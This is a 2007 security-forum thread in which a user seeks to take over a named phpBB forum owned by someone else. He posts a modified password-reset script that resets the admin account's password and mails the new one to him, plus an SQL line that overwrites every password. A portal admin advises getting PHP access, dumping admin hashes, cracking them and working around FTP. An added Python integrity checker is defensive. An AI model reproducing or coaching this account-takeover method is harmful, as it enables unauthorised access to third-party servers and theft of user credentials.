Waraxe IT Security Portal
How to obtain MD5 hashes on phpbb 2.0.22?
Posted: Fri Dec 21, 2007 1:19 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I can do the rest myself easily enough. The site has html disabled, only standard bbcode, and (for now) the docs directory is still there, unprotected. Here is a full path disclosure of the site.

/home/exosyph/public_html/addon-domain-exosyphenstudios-com/site-forum/profile.php

Any help would be GREATLY appreciated. I know the admin of the site personally and I don't want the hash to get revenge or anything like that, simply to convince him to upgrade to something more secure or at least change his board config.

Posted: Fri Dec 21, 2007 1:37 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

phpbb 2.0.22 happens to be the latest version of the 2.x branch. So there are no known security issues as of today - correct me if I'm wrong.
Your choices are:

1. possibly vulnerable MODs in the target phpbb installation
2. co-located websites on the same webserver

Posted: Fri Dec 21, 2007 1:50 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Thanks for the reply, and as far as I know he doesn't have any MODs installed, and most of the non-standard features he made himself. He's a game programmer and a wiz at C++ and I'm guessing he knows php at least casually. I have a few ideas of exploits but no sure way to implement them. One idea I had was: he has a web server and it seems that anonymous users can upload files (may be mistaken, I haven't tried). I thought that if I could mod the files that resend passwords (already done this on my own site, converted the "generate new pass" to a "recover my pass" feature. Safe enough because I'm the only admin) and upload them to the server then just access them from firefox, reset the password, and have it sent to me instead of his email. This is not easy for me though since I'm a novice (at best) concerning php. I'm not sure about other websites linked to his, and my other idea (only other one that may work) is since the doc directory is still open to possibly access that, change some files to php to send me the password, then access them.
Here's all I have so far, which is the modded usercp_sendpasswd.php file
Code:
<?php
/***************************************************************************
* usercp_sendpasswd.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: usercp_sendpasswd.php,v 1.6.2.13 2005/09/14 18:14:30 acydburn Exp $
*
*
***************************************************************************/

/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( isset($HTTP_POST_VARS['submit']) )
{
$username = ( !empty($HTTP_POST_VARS['username']) ) ?

phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$email = ( !empty($HTTP_POST_VARS['email']) ) ?

trim(strip_tags(htmlspecialchars($HTTP_POST_VARS['email']))) : '';

$sql = "SELECT user_id, username, user_email, user_active, user_lang, pw_backup
FROM " . USERS_TABLE . "
WHERE user_id = 2";
if ( $result = $db->sql_query($sql) )
{
if ( $row = $db->sql_fetchrow($result) )
{
if ( !$row['user_active'] )
{
message_die(GENERAL_MESSAGE,

$lang['No_send_account_inactive']);
}

$username = $row['username'];
$user_id = $row['user_id'];

$user_actkey = gen_rand_string(true);
$key_len = 54 - strlen($server_url);
$key_len = ($key_len > 6) ? $key_len : 6;
$user_actkey = substr($user_actkey, 0, $key_len);
$user_password = gen_rand_string(false);

$sql = "UPDATE " . USERS_TABLE . "
SET user_newpasswd = '" . md5($user_password) . "',

user_actkey = '$user_actkey'
WHERE user_id = " . $row['user_id'];
if ( !$db->sql_query($sql) )
{
message_die(GENERAL_ERROR, 'Could not update new password

information', '', __LINE__, __FILE__, $sql);
}

include($phpbb_root_path . 'includes/emailer.'.$phpEx);
$emailer = new emailer($board_config['smtp_delivery']);

$emailer->from($board_config['board_email']);
$emailer->replyto($board_config['board_email']);

$emailer->use_template('user_activate_passwd', $row['user_lang']);
$emailer->email_address("myemail@.com";
$emailer->set_subject($lang['New_password_activation']);

$emailer->assign_vars(array(
'SITENAME' => $board_config['sitename'],
'USERNAME' => $username,
'PASSWORD' => $user_password,
'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ?

str_replace('<br />', "\n", "-- \n" . $board_config['board_email_sig']) : '',

'U_ACTIVATE' => $server_url . '?mode=activate&' .

POST_USERS_URL . '=' . $user_id . '&act_key=' . $user_actkey)
);
$emailer->send();
$emailer->reset();

$template->assign_vars(array(
'META' => '<meta http-equiv="refresh" content="15;url=' .

append_sid("index.$phpEx") . '">')
);

$message = $lang['Password_updated'] . '<br /><br />' .

sprintf($lang['Click_return_index'], '<a href="' . append_sid("index.$phpEx") . '">',

'</a>');

message_die(GENERAL_MESSAGE, $message);
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_email_match']);
}
}
else
{
message_die(GENERAL_ERROR, 'Could not obtain user information for

sendpassword', '', __LINE__, __FILE__, $sql);
}
}
else
{
$username = '';
$email = '';
}

//
// Output basic page
//
include($phpbb_root_path . 'includes/page_header.'.$phpEx);

$template->set_filenames(array(
'body' => 'profile_send_pass.tpl')
);
make_jumpbox('viewforum.'.$phpEx);

$template->assign_vars(array(
'USERNAME' => $username,
'EMAIL' => $email,

'L_SEND_PASSWORD' => $lang['Send_password'],
'L_ITEMS_REQUIRED' => $lang['Items_required'],
'L_EMAIL_ADDRESS' => $lang['Email_address'],
'L_SUBMIT' => $lang['Submit'],
'L_RESET' => $lang['Reset'],

'S_HIDDEN_FIELDS' => '',
'S_PROFILE_ACTION' => append_sid("profile.$phpEx?mode=sendpassword"))
);

$template->pparse('body');

include($phpbb_root_path . 'includes/page_tail.'.$phpEx);

?>

Posted: Fri Dec 21, 2007 1:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

You can upload and/or manipulate php files on the target server? So what's the problem? You can do whatever you want then. With a few php lines you can fetch the needed data from the database or modify data directly. Php scripting level access is considered a higher level than phpbb admin.
View user's profile Send private message Send e-mail Visit poster's website
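
A defender's counterpart to the point above, as an added example that is not part of the original thread: because write access to PHP files in the web root outranks the board's own admin account, a hash baseline of the phpBB tree, kept off the server, shows when a stock file such as usercp_sendpasswd.php has been altered or a new script has appeared. The helper names and the sample tree are constructed for illustration.

```python
import hashlib
import os
import tempfile

def build_manifest(root):
    """Return {relative path: SHA-256 hex digest} for every file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = digest
    return manifest

def diff_manifests(baseline, current):
    """Compare a trusted baseline against the live tree."""
    return {
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }

def write(root, rel, text):
    """Create or overwrite a file in the constructed sample tree."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)

def demo():
    """Constructed tree: baseline it, change it, report the drift."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "profile.php", "<?php // stock file\n")
        write(root, "includes/usercp_sendpasswd.php", "<?php // stock file\n")
        baseline = build_manifest(root)  # in practice, store off the web server
        # Simulated drift: one core file edited, one script not in the release.
        write(root, "includes/usercp_sendpasswd.php", "<?php // edited\n")
        write(root, "docs/dropped.php", "<?php // not in the release\n")
        return diff_manifests(baseline, build_manifest(root))

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```
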

Posted: Fri Dec 21, 2007 2:01 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Like I said, these are just theories...ideas. I THINK I can upload. I don't know for sure. You also have to remember I don't know a lot of php. I don't know the lines. The best I could do would be
Code:
$pass = md5("w/e pass i want"); $sql = "UPDATE" . USERS_TABLE . " SET user_password = $pass";
This may or may not work, and like I said it's just to prove a point, not get revenge. Even if the anonymous FTP user CAN upload I have no idea WHERE the files would be. All of this is sheer theory.

Posted: Fri Dec 21, 2007 2:05 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Then first try to prove your theory and get access to the php level. And then just write a little php code which will fetch all users (or only admins) from the database and write the data to some file or just echo it back. And then try to crack the md5 hashes you fetched.

Posted: Fri Dec 21, 2007 2:15 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Well honestly I'm new to this. I'm a white-hat script kiddie (at best) so right now I need as much help as I can get. I know the sql (more or less) to fetch the password of a specified user, which is what I want. I just can't think of anything that submits an sql query with variables I can exploit. Honestly I don't think it has to be ME doing this, just anyone who can. Proof of concept doesn't care who creates it. I'll admit I'm a computer programmer but the languages I know well enough to use are either outdated (like VB6) or are disabled (like html). I'm also willing to admit I'm not a "master" of any language in the sense I don't know any language fully. I know enough to get by. I have NO skill with FTP since I've never used it before and thus I can't test any of these ideas. I do know that when I log in with the anonymous account I do this:
ls
200 PORT command successful
after that it usually gives me a time-out message. When I logout it says
goodbye anonymous. You have uploaded 0 bytes and have downloaded 0 bytes. That is what gave me the impression the anonymous user could upload.

Posted: Fri Dec 21, 2007 2:24 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If you can log in as anonymous but after ls command get timeout, then it seems to be firewall problem. From internet:

Code:

Common Firewall

* I can connect to the FTP server. The connection hangs after the ls, dir, put or get command.
o Use passive FTP. This is done with the "passive" command for most command line clients. If your client does not offer the passive command it will use active FTP properly.



So try to use passive mode. And "ls -la" is a better choice - you can see dir and file permissions.


Last edited by waraxe on Fri Dec 21, 2007 2:27 pm; edited 1 time in total

Posted: Fri Dec 21, 2007 2:26 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I'm using the built-in (sucky, yes I know) Windows ftp client, the one from cmd, so I guess I can't use passive mode. I'll try allowing it in my firewall. Also thanks for the info about "ls -la"

Posted: Fri Dec 21, 2007 2:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Once you have connected and logged in, use the following command from the Windows FTP command line client:

LITERAL PASV

You should then see "Entering Passive Mode" :)

Posted: Fri Dec 21, 2007 2:35 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Oh, thank you very much. I told you I'd never done FTP before and I suppose that proved it :P. I'm only 19 so I deserve a break (not really but it's fun to say). Here's the output I got.

220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 08:31. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (*********.com:(none)):
230 Anonymous user logged in
ftp> LITERAL PASV
227 Entering Passive Mode (**,**,**,**,147,133)
ftp> ls -la
200 PORT command successful
425 Could not open data connection to port 50016: Connection timed out
ftp>

It can't be my firewall because it was turned completely off this time.

Also this may help:

214-The following SITE commands are recognized
ALIAS
CHMOD
IDLE
UTIME
214 Pure-FTPd - http://pureftpd.org/

Posted: Fri Dec 21, 2007 2:43 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If you have no firewall between you and the ftp server, then the ls command must work without PASSIVE mode, and PASSIVE should work too. How are you connected to the internet? From home, DSL? Maybe your ISP has firewall restrictions. Try some other anonymous ftp servers, like ftp.microsoft.com - do they work? Without PASV?

Posted: Fri Dec 21, 2007 2:45 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I have Charter, so I have a cable modem. I was able to enter passive mode but not much of anything else. If you look at my previous post you'll see the available commands for anonymous users. I may have posted after you started typing your response.

Posted: Fri Dec 21, 2007 2:46 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Still - try other ftp servers in order to determine whether it is a common problem or related only to a specific ftp server.

Posted: Fri Dec 21, 2007 2:49 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

This is the output I got from my own website's FTP server. No, I don't generally connect, I just store files there for my members to download.

220 Welcome to the New Chaos Programming FTP Server
User (****:(none)):
501 Syntax error
Login failed.
ftp> user anonymous
331 Password required for anonymous
Password:
230 Logged on
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
incoming
onefile.html
226 Transfer OK
ftp: 24 bytes received in 0.00Seconds 24000.00Kbytes/sec.
ftp>
All times are GMT
Page 1 of 2